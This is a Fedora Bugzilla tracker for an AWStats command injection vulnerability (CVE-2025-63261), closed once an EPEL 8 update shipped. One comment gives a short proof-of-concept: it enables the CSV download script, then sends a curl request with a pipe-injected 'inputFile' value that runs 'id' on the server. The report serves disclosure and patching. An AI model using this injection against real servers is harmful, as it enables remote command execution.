2450260 – CVE-2025-63261 awstats: AWStats: Arbitrary code execution via command injection vulnerability [epel-all]

Bug 2450260 - CVE-2025-63261 awstats: AWStats: Arbitrary code execution via command injection vulnerability [epel-all]

Summary: CVE-2025-63261 awstats: AWStats: Arbitrary code execution via command injecti...

Keywords:
Status:	CLOSED ERRATA
Alias:	None
Product:	Fedora EPEL
Classification:	Fedora
Component:	awstats
Sub Component:
Version:	epel8
Hardware:	Unspecified
OS:	Unspecified
Priority:	high
Severity:	high
Target Milestone:	---
Assignee:	Tim Jackson
QA Contact:	Fedora Extras Quality Assurance
Docs Contact:
URL:
Whiteboard:	{"flaws": ["56bf8b03-82ec-4824-b120-a...
Depends On:
Blocks:	CVE-2025-63261
TreeView+	depends on / blocked

Reported:	2026-03-23 09:09 UTC by Vipul Nair
Modified:	2026-04-20 00:23 UTC (History)
CC List:	5 users (show)
Fixed In Version:	awstats-8.0-1.el8
Clone Of:
Environment:
Last Closed:	2026-04-20 00:23:57 UTC
Type:	---
Embargoed:

Attachments	(Terms of Use)

Description Vipul Nair 2026-03-23 09:09:31 UTC

Disclaimer: Community trackers are created by Red Hat Product Security team on a best effort basis. Package maintainers are required to ascertain if the flaw indeed affects their package, before starting the update process.

Comment 1 Yohsuke Ooi 2026-04-05 14:22:59 UTC

I understand that AWStats is no longer being actively maintained and is slated for removal from future Fedora packages. However, given the impact of the recent vulnerability (CVE-2025-63261), could you please consider addressing this issue?

It appears that a patch has been proposed in the following issue:
https://github.com/eldy/AWStats/issues/287

Could you please review this and let me know if it's possible to apply the fix? Thank you for your time and effort.

Comment 2 Yohsuke Ooi 2026-04-07 04:50:42 UTC Comment hidden (spam)

I would like to provide additional information regarding this ticket.

While investigating the issue in awstats.pl, I found that a similar command injection vulnerability also exists in awdownloadcsv.pl when the $ALLOWDOWNLOAD configuration is enabled.

This finding is consistent with the vulnerability report discussed on the OSS-security mailing list:
https://www.openwall.com/lists/oss-security/2026/03/08/8

Vulnerability Detail:
In awdownloadcsv.pl, the inputFile parameter is not properly sanitized before being used in an open() call (or similar file-handling functions), allowing for arbitrary command execution via the pipe character (|).

1. Prepare the environment and install packages

---
crb enable
dnf install -y https://dl.fedoraproject.org/pub/epel/epel-release-latest-9.noarch.rpm
dnf install -y awstats httpd
systemctl start httpd
---

2. Enable the download feature in the script
---
sed -i 's/my $ALLOWDOWNLOAD=0;/my $ALLOWDOWNLOAD=1;/' /usr/share/awstats/wwwroot/cgi-bin/awdownloadcsv.pl
---

3. Execute command
---
curl "http://localhost/awstats/awdownloadcsv.pl?inputFile=%7Cid"
---


Result
The command "id" is executed, and the output is returned in the response.
Output:
uid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:awstats_script_t:s0

Comment 3 Fedora Update System 2026-04-10 23:01:57 UTC

FEDORA-EPEL-2026-3bef016061 (awstats-8.0-1.el8) has been submitted as an update to Fedora EPEL 8.
https://bodhi.fedoraproject.org/updates/FEDORA-EPEL-2026-3bef016061

Comment 4 Fedora Update System 2026-04-12 16:01:48 UTC

FEDORA-EPEL-2026-3bef016061 has been pushed to the Fedora EPEL 8 testing repository.

You can provide feedback for this update here: https://bodhi.fedoraproject.org/updates/FEDORA-EPEL-2026-3bef016061

See also https://fedoraproject.org/wiki/QA:Updates_Testing for more information on how to test updates.

Comment 5 Fedora Update System 2026-04-20 00:23:57 UTC

FEDORA-EPEL-2026-3bef016061 (awstats-8.0-1.el8) has been pushed to the Fedora EPEL 8 stable repository.
If problem still persists, please make note of it in this bug report.

Note You need to log in before you can comment on or make changes to this bug.